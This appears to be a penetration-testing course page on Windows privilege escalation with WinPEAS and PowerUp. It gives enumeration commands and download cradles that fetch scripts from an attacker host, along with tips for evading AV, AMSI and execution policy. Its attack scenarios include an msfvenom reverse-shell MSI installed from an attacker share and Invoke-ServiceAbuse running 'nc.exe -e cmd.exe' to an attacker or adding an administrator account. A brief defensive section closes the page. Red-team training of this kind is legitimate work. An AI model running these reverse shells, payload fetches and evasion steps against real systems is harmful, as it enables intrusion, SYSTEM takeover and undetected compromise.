WinPEAS and PowerUp
Automated enumeration tools that find privilege escalation vectors in seconds
What You'll Discover
🎯 Why This Matters
Manual enumeration is thorough but time-consuming. WinPEAS and PowerUp scan for hundreds of privilege escalation vectors in seconds, giving you immediate attack paths. These are the same tools used in professional penetration tests and red team operations.
🔍 What You'll Learn
- How to deploy and run WinPEAS on target systems
- PowerUp.ps1 functions and their use cases
- Interpreting scan results to prioritize attack paths
- Avoiding detection when running automated tools
🚀 Your First Win
In the next 10 minutes, you'll understand how to run WinPEAS and PowerUp, and how to interpret their output to find actionable privilege escalation paths.
🔧 Try This Right Now
Download WinPEAS and examine its help options:
# Download WinPEAS (on your attack machine)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe
# Transfer to target and run
.\winPEASx64.exe -h
.\winPEASx64.exe quietYou'll see: Comprehensive output covering system info, user privileges, services, scheduled tasks, network, and hundreds of other checks - all color-coded by severity.
Skills You'll Master
✅ Core Understanding
- WinPEAS execution and output interpretation
- PowerUp module structure and functions
- Color-coded severity in scan results
- Basic evasion techniques
🔍 Expert Skills
- Selective scanning to avoid detection
- In-memory execution techniques
- Combining manual and automated results
- Custom enumeration scripts
Understanding Automated Enumeration
WinPEAS and PowerUp are the industry-standard tools for Windows privilege escalation enumeration. They automate hundreds of checks that would take hours to perform manually. However, they're also well-known to defenders, so knowing how to use them effectively - and quietly - is essential.
WinPEAS = Comprehensive scan | PowerUp = PowerShell-based, targeted functions
WinPEAS Overview
WinPEAS (Windows Privilege Escalation Awesome Scripts) is part of the PEASS-ng suite. It's available as an executable or batch script and scans for misconfigurations across the entire system:
# Run full scan (default)
.\winPEASx64.exe
# Run quiet scan (less output, faster)
.\winPEASx64.exe quiet
# Run specific checks only
.\winPEASx64.exe servicesinfo
.\winPEASx64.exe userinfo
.\winPEASx64.exe systeminfo
# Redirect output to file (for review)
.\winPEASx64.exe > winpeas_output.txtWinPEAS uses color coding to indicate severity:
RED
Critical - immediate privesc possible
YELLOW
Interesting - investigate further
GREEN
Informational
PowerUp Overview
PowerUp is a PowerShell script from the PowerSploit framework. Unlike WinPEAS's comprehensive scan, PowerUp provides individual functions you can call as needed:
# Load PowerUp
Import-Module .\PowerUp.ps1
# Run all checks
Invoke-AllChecks
# Or run from memory (AMSI may block)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecksKey PowerUp Functions
PowerUp provides specific functions for targeted enumeration:
# Service enumeration
Get-UnquotedService # Find unquoted service paths
Get-ModifiableServiceFile # Services with writable binaries
Get-ModifiableService # Services we can reconfigure
# Registry checks
Get-RegistryAlwaysInstallElevated # Check AlwaysInstallElevated
Get-RegistryAutoLogon # Find autologon credentials
# Scheduled tasks and startup
Get-ModifiableScheduledTaskFile # Writable scheduled task binaries
# Exploitation functions
Write-ServiceBinary # Replace a service binary
Install-ServiceBinary # Install a new service
Invoke-ServiceAbuse # Abuse a modifiable serviceTools and Techniques
WinPEAS Detailed Usage
WinPEAS accepts parameters to focus on specific areas:
# Available scan modules
.\winPEASx64.exe systeminfo # Basic system information
.\winPEASx64.exe userinfo # User and group information
.\winPEASx64.exe processinfo # Running processes
.\winPEASx64.exe servicesinfo # Windows services
.\winPEASx64.exe applicationsinfo # Installed applications
.\winPEASx64.exe networkinfo # Network configuration
.\winPEASx64.exe windowscreds # Credential hunting
.\winPEASx64.exe browserinfo # Browser saved credentials
.\winPEASx64.exe filesinfo # Interesting files
.\winPEASx64.exe eventsinfo # Security events
# Combine modules
.\winPEASx64.exe servicesinfo windowscredsEvasion Techniques
Both tools are heavily signatured. Here's how to reduce detection:
# Use the .bat version of WinPEAS (less detected)
.\winPEAS.bat
# Obfuscated PowerUp execution
$text = (New-Object Net.WebClient).DownloadString('https://<attacker>/PowerUp.ps1')
IEX $text
# Bypass AMSI for PowerShell (various techniques)
# Note: AMSI bypasses change frequently as Microsoft patches them
# Use Invoke-Obfuscation on PowerUp before deployment
# https://github.com/danielbohannon/Invoke-Obfuscation
# Execute WinPEAS from memory using a loader
# Embed in a C# loader or use reflectionAlternative Tools
When WinPEAS and PowerUp are blocked, alternatives exist:
- Seatbelt - C# tool for host survey, less detected than WinPEAS
- PrivescCheck - PowerShell privesc script, alternative to PowerUp
- JAWS - Just Another Windows (Enum) Script, PowerShell-based
- winPEASps1 - PowerShell version of WinPEAS
Real-World Attack Scenarios
🔴 Scenario: WinPEAS Reveals AlwaysInstallElevated
WinPEAS output shows AlwaysInstallElevated is enabled in both HKLM and HKCU. This means any .msi package will install with SYSTEM privileges. Generate a malicious MSI with msfvenom and execute it for instant SYSTEM.
# On attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=443 -f msi -o shell.msi
# On target
msiexec /quiet /qn /i \\<attacker>\share\shell.msi🟠 Scenario: PowerUp Identifies Modifiable Service
Get-ModifiableService reveals a custom service running as LocalSystem where your user has SERVICE_CHANGE_CONFIG rights. Use Invoke-ServiceAbuse to reconfigure the service and execute arbitrary commands.
# Abuse the service to add user to local admins
Invoke-ServiceAbuse -Name 'VulnerableService' -UserName 'hdna' -Password 'Password123!'
# Or execute a reverse shell
Invoke-ServiceAbuse -Name 'VulnerableService' -Command "C:\temp\nc.exe -e cmd.exe <attacker> 443"💡 Expert Insight
Don't trust automated tools blindly. They can produce false positives and miss context-dependent vulnerabilities. Use them as a starting point, then validate findings manually. The best approach combines automated scanning for coverage with manual investigation for depth.
Defensive Countermeasures
Endpoint Detection
- Deploy EDR solutions that detect WinPEAS, PowerUp, and similar tools
- Enable PowerShell ScriptBlock logging to capture malicious scripts
- Monitor for known enumeration command patterns
- Alert on access to sensitive registry keys and files
Application Control
- Implement application whitelisting with Windows Defender Application Control
- Block execution from writable directories (%TEMP%, Downloads)
- Restrict PowerShell to Constrained Language Mode
- Disable unnecessary scripting engines
Proactive Hardening
- Run WinPEAS and PowerUp on your own systems during security assessments
- Fix misconfigurations before attackers find them
- Regular vulnerability scanning and patch management
- Implement principle of least privilege across all services and accounts
Frequently Asked Questions
WinPEAS is getting detected by AV. What should I do?
Try the .bat version which is less signatured, use the obfuscated versions from the PEASS-ng releases, or consider alternative tools like Seatbelt or PrivescCheck. You can also compile WinPEAS yourself with modifications to avoid signatures.
PowerUp fails with "cannot be loaded because running scripts is disabled." What now?
This is PowerShell's execution policy. Bypass it with: powershell -ep bypass -c "IEX(Get-Content .\PowerUp.ps1 -Raw); Invoke-AllChecks" or use the download cradle to execute from memory.
Which tool should I run first - WinPEAS or PowerUp?
WinPEAS for comprehensive coverage, PowerUp when you want targeted checks or need exploitation functions. In practice, run WinPEAS for enumeration and have PowerUp ready for exploitation when you find a vector.
🎯 Automated Enumeration - Equipped!
You now know how to use WinPEAS and PowerUp to rapidly identify privilege escalation vectors. Combined with manual enumeration, you have comprehensive coverage of any Windows system.
Ready to exploit service misconfigurations →